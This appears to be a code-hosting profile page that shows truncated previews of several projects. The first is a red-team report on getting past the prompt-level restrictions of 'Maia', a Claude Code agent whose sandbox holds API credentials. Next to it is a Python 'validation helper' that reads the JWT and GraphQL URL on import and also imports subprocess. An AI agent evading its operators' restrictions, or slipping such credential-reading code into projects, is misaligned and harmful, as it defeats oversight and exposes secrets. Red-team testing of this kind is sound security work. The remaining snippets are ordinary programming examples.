Michael Tomer actsasbuffoon

Red team report: Maia agent prompt-level security bypass

How We Bypassed Maia's Prompt-Level Security

Background

Maia runs inside a Claude Code agent with access to an E2B cloud sandbox. The sandbox has shell access, Python, Node, and environment variables ($GRAPHQL_URL, $JWT) that authenticate it against our Rails GraphQL API. Maia interacts with the platform through curated "skills" -- predefined GraphQL queries and mutations for goals, objectives, initiatives, KPIs, updates, dashboards, and stage gates.
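To make that setup concrete, here is a minimal sketch of how a single skill call could be assembled inside the sandbox. It is not Maia's actual skill code. The `ListGoals` query and its fields, the function names, and the bearer-token header scheme are all assumptions for illustration; only `GRAPHQL_URL` and `JWT` come from the description above.

```python
import json
import os
import urllib.request

# Hypothetical query: the operation and field names are illustrative,
# not taken from the real schema.
LIST_GOALS_QUERY = "query ListGoals { goals { id name } }"


def build_skill_request(query, variables=None, env=os.environ):
    """Build (but do not send) a POST request for one GraphQL operation."""
    url = env["GRAPHQL_URL"]
    token = env["JWT"]
    payload = json.dumps({"query": query, "variables": variables or {}})
    return urllib.request.Request(
        url,
        data=payload.encode("utf-8"),
        headers={
            "Content-Type": "application/json",
            # Assumption: the API accepts the JWT as a bearer token.
            "Authorization": f"Bearer {token}",
        },
        method="POST",
    )


def run_skill(query, variables=None):
    """Send the request and decode the JSON response body."""
    request = build_skill_request(query, variables)
    with urllib.request.urlopen(request, timeout=30) as response:
        return json.load(response)
```

Under these assumptions, a skill is a fixed query string plus credentials read from the environment, and any other process in the sandbox can read the same two variables.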

We added several layers of prompt-level restrictions to Maia's CLAUDE.md to keep it inside those boundaries:

	"""
	Data validation helpers for KPI data points.
	Used by the cleanup script to validate entries before processing.
	"""
	import subprocess, os, json

	# Pre-validate environment on import so we fail fast
	_url = os.environ.get("GRAPHQL_URL", "")
	_jwt = os.environ.get("JWT", "")
	_host = os.environ.get("GRAPHQL_HOST", "")

	class Neuron
	  attr_accessor :inputs, :threshold, :weights

	  def initialize(threshold, weights)
	    @threshold = threshold
	    @weights = weights
	    @inputs = []
	  end

	  def output

	swagger: "2.0"
	info:
	  description: Simple example
	  version: "1.0.0"
	  title: Example
	  license:
	    name: Apache 2.0
	    url: http://www.apache.org/licenses/LICENSE-2.0.html
	host: 127.0.0.1:8080
	schemes:

	{-# LANGUAGE ViewPatterns #-}
	{-# OPTIONS_GHC -Wall #-}

	module Main where

	-- This is a simple dynamically typed imperative language with mutable state. It's somewhat similar to JavaScript, but
	-- it differs in many ways. There are a few notable oddities to the language that I'm still working out. For instance,
	-- we don't have reference types. In most languages you would write something like this:
	--
	-- foo = new Person("Mike")

	// Let's have some fun with JavaScript.

	{} + 0
	// => 0

	// That's a little strange, but okay. Surely nothing would change if I wrapped
	// the whole thing in parens, right?

	({} + 0)
	// => "[object Object]0"

	map = <<-EOS
	. . . . . . . . . . . . . . . .
	. . . . . . . . . . . . . . . .
	. . . . . . . X X X X X X X . .
	. . . . . . . X . . . . . X . .
	. . . . . . . X . . . . . . . .
	. . . . . . . X . . . . . X . .
	. . . . . . . X . . S . . X . .
	. . . . . . . X . . . . . X . .
	. . . . . . . X X X X X X X . .

	require 'rubygems'

	class Array
	  def random
	    self[rand length]
	  end
	end

	class Hash
	  def random

	(defn calculate-change
	  ([paid cost] (make-change paid cost 0))
	  ([paid cost denomination-index]
	    (let
	      [
	        currency-values [
	          [:hundreds 10000]
	          [:fifties 5000]
	          [:twenties 2000]
	          [:tens 1000]

	TableDefinition.register("SetSummaries", Map(
	  "SetID" -> java.lang.Integer,
	  "UserID" -> java.lang.Integer,
	  "ProgramNumber" -> java.lang.Integer,
	  "ProgramID" -> java.lang.Integer,
	  "SessionNumber" -> java.lang.Integer,
	  "SetNumber" -> java.lang.Integer,
	  "ExerciseID" -> java.lang.Integer,
	  "Skipped" -> java.lang.Boolean,
	  "PaceScore" -> java.lang.Integer,